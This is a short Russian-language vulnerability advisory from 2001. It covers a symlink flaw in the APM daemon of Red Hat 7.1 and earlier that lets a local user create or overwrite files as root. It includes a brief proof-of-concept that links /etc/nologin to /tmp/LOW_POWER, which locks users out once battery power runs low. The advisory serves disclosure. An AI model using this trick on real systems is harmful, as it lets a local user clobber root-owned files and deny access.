Проблема символьных линков в Advanced Power Management

Дата публикации:
18.12.2001
Всего просмотров:
687
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Демон Расширенного управление питанием (Advanced Power Management), поставляемый с некоторыми версиями RedHat, содержит уязвимость символьных линков (в файле tmp/LOW_POWER), которая позволяет локальному пользователю записывать поверх и создавать файлы с привилегиями корня.
Уязвимы Red Hat 7.1 и более ранние версии.
Пример:
$ ssh foo
$ exit

$ ln -s /etc/nologin /tmp/LOW_POWER
...[provoke low-battery state; e.g. cut powerline and wait some time] ...

$ ssh foo
Connection to foo closed.
$
 


или введите имя

CAPTCHA